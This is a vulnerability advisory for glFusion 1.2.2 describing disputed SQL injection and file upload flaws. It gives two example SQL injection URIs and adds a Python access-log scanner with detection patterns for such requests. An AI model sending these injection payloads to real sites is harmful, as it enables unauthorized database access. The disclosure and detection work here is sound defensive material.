glFusion SQL Injection and Arbitrary File Upload Vulnerabilities
BID:51650
Info
| Bugtraq ID: | 51650 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 24 2012 12:00AM |
| Updated: | Feb 02 2012 09:30PM |
| Credit: | KedAns-Dz |
| Vulnerable: | glFusion 1.2.2; glFusion 1.2.1; glFusion 1.1.3; glFusion 1.1.2; glFusion 1.1.1; glFusion 1.1 |
| Not Vulnerable: | |
Discussion
glFusion is prone to multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
glFusion 1.2.2 is vulnerable; other versions may also be affected.
The vendor refutes these issues, stating that they cannot be exploited as specified.
Exploit / POC
An attacker can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/[path]/profiles.php?sid=-1+UNION+SELECT+1,2,3,4,5,version(),NULL,6--
http://www.example.com/[path]/article.php?story='1 AND 2=-1 UNION SELECT 1,2,3,4,5,version(),NULL,6--
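A defensive check for the request pattern in the example URIs above, added here as an illustration (it is not part of the original advisory or of glFusion's code): it scans web access log lines for `sid` and `story` values that carry SQL syntax. The combined log format, the sample lines, the `/cms/` path and the rule that legitimate ids are short alphanumeric tokens are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Script -> parameter pairs taken from the advisory's example URIs.
WATCHED = {"profiles.php": "sid", "article.php": "story"}
# Assumption: legitimate ids are short alphanumeric tokens (plus '-' and '_').
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,128}")
SQL_HINT = re.compile(r"\bunion\b.+\bselect\b|--|'|\bversion\s*\(", re.I | re.S)
# Request line of a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_line(line):
    """Return (script, param, value, reason) for a suspicious request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    script = url.path.rsplit("/", 1)[-1]
    param = WATCHED.get(script)
    if param is None:
        return None
    # parse_qs percent-decodes and maps '+' to a space, as PHP does for $_GET.
    for value in parse_qs(url.query).get(param, []):
        if SQL_HINT.search(value):
            return (script, param, value, "sql-syntax")
        if not SAFE_ID.fullmatch(value):
            return (script, param, value, "unexpected-characters")
    return None

def scan(lines):
    """Collect findings for every log line that trips a check."""
    return [hit for hit in map(inspect_line, lines) if hit]

# Constructed sample log (documentation addresses, hypothetical /cms/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Jan/2012:10:00:01 +0000] "GET /cms/profiles.php?sid=-1+UNION+SELECT+1,2,3,4,5,version(),NULL,6-- HTTP/1.1" 200 5120',
    '192.0.2.10 - - [24/Jan/2012:10:00:07 +0000] "GET /cms/article.php?story=%271%20AND%202=-1%20UNION%20SELECT%201,2,3,4,5,version(),NULL,6-- HTTP/1.1" 200 4811',
    '198.51.100.7 - - [24/Jan/2012:10:01:12 +0000] "GET /cms/article.php?story=20120124093000123 HTTP/1.1" 200 9034',
    '198.51.100.7 - - [24/Jan/2012:10:01:15 +0000] "GET /cms/index.php?topic=news HTTP/1.1" 200 7710',
]

if __name__ == "__main__":
    for script, param, value, reason in scan(SAMPLE_LOG):
        print(f"{script} {param}={value!r} -> {reason}")
```

The values are decoded before matching, so the `+`-encoded and `%20`-encoded forms of the same request are both caught; requests to scripts other than the two named in the advisory are ignored.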
Solution / Fix
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
- glFusion Homepage (glFusion)